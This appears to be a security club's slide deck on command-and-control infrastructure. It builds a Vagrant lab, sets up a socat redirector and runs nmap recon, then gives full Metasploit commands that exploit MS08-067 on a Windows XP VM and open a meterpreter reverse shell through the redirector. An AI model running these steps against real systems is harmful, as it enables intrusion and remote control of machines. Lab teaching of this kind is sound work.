orgsync.com/79368/
C2 Intro
First Vagrant!
- Make sure it is installed
- grab the Vagrantfile or if you have Kali this Vagrantfile
- powershell
- OSX
- Linux
- vagrant up! no really... (this will take a bit...)
wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017-2018/Fall/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -O Vagrantfile
curl https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017-2018/Fall/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -o Vagrantfile
wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017-2018/Fall/01-Intermediate-Monday/08-C2-Infra/Vagrantfile
vagrant up
Learning from others
- My research
Visualization
House keeping...
- fixing windows
- check -
- fix
- verify
- setup redir
vagrant ssh winxp -- -oKexAlgorithms=+diffie-hellman-group1-sha1
ipconfig
vagrant ssh redir
sudo socat TCP4-LISTEN:443,fork TCP4:192.168.55.2:443
Recon!
- Vagrant commands
- see all vms
- Now Kali
vagrant global-status
vagrant ssh kali
ifconfig
nmap -sT -O 192.168.55.0/24 -oA initial-network
ls
Recon
Exploitation - metasploit
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp # This is the payload I set
show options # This shows all the options for the payload and exploit
set RHOST 192.168.55.3 # The host you are attacking
set LHOST 192.168.55.4 # The external IP that the payload should connect to
set LPORT 443 # External port that the payload will connect to
set ReverseListenerBindAddress 192.168.55.2 # The internal IP address of the kali box that's being NAT'd
set ReverseListenerBindPort 443
set ExitOnSession false # Don't stop the handler once a session is established (allows you to receive multiple sessions for a handler)
exploit -j -z # Start the exploit as a job. Do not automatically interact with new sessions.
## after you have your session do this to see and interact with it.
sessions -l
# connect to whatever your session number is that displays below
sessions -i 1
# to interact with your exploited host
shell
# to show that the metasploit module isn't connected to your machine
netstat
Copy of C2 infrastructure
By elrey741 (Alex)
Copy of C2 infrastructure
- 927